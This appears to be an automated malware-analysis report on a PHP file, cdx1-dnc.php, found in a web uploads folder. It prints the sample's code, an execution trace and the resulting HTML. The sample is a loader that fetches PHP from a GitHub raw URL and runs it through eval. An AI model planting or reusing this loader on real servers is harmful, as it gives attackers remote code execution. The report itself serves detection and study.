PHP Malware Analysis
cdx1-dnc.php
md5: 90bc3f7090dc3996c4f2e1b39ec04eac
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- eval (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
Title
- CODEX CYBER ARMY (Deobfuscated, HTML, Original)
URLs
- https://i.imgur.com/mL4nqp6.png (Deobfuscated, HTML, Original)
- https://raw.githubusercontent.com/haxxorteam/haxxor/main/cdx.php (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<html>
<head>
<title>CODEX CYBER ARMY</title>
<link rel="shortcut icon" href="https://i.imgur.com/mL4nqp6.png" type="image/x-icon">
<meta name='author' content='CODEX'>
<link rel="shortcut icon" href="CODEX">
<meta http-equiv="Cache-Control" content="no-store" />
<meta charset="UTF-8">
</head>
<?php
echo eval("?>" . file_get_contents("https://raw.githubusercontent.com/haxxorteam/haxxor/main/cdx.php"));Execution traces
data/traces/90bc3f7090dc3996c4f2e1b39ec04eac_trace-1676237492.9991.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:31:58.896960]
1 0 1 0.000134 393528
1 3 0 0.000181 394016 {main} 1 /var/www/html/uploads/cdx1-dnc.php 0 0
2 4 0 0.000198 394016 file_get_contents 0 /var/www/html/uploads/cdx1-dnc.php 10 1 'https://raw.githubusercontent.com/haxxorteam/haxxor/main/cdx.php'
2 4 1 0.038047 397104
2 4 R 'CODEX SERVER MAINTENANCE\r\n'
2 5 0 0.038105 397568 eval 1 '?>CODEX SERVER MAINTENANCE\r\n' /var/www/html/uploads/cdx1-dnc.php 10 0
2 5 1 0.038124 397568
2 5 R NULL
1 3 1 0.038139 397144
0.038182 317176
TRACE END [2023-02-12 19:31:58.935034]
Generated HTML code
<html><head>
<title>CODEX CYBER ARMY</title>
<link rel="shortcut icon" href="https://i.imgur.com/mL4nqp6.png" type="image/x-icon">
<meta name="author" content="CODEX">
<link rel="shortcut icon" href="CODEX">
<meta http-equiv="Cache-Control" content="no-store">
<meta charset="UTF-8">
</head>
<body>CODEX SERVER MAINTENANCE
</body></html>Original PHP code
<html>
<head>
<title>CODEX CYBER ARMY</title>
<link rel="shortcut icon" href="https://i.imgur.com/mL4nqp6.png" type="image/x-icon">
<meta name='author' content='CODEX'>
<link rel="shortcut icon" href="CODEX">
<meta http-equiv="Cache-Control" content="no-store" />
<meta charset="UTF-8">
</head>
<?=eval("?>".file_get_contents("https://raw.githubusercontent.com/haxxorteam/haxxor/main/cdx.php"));?>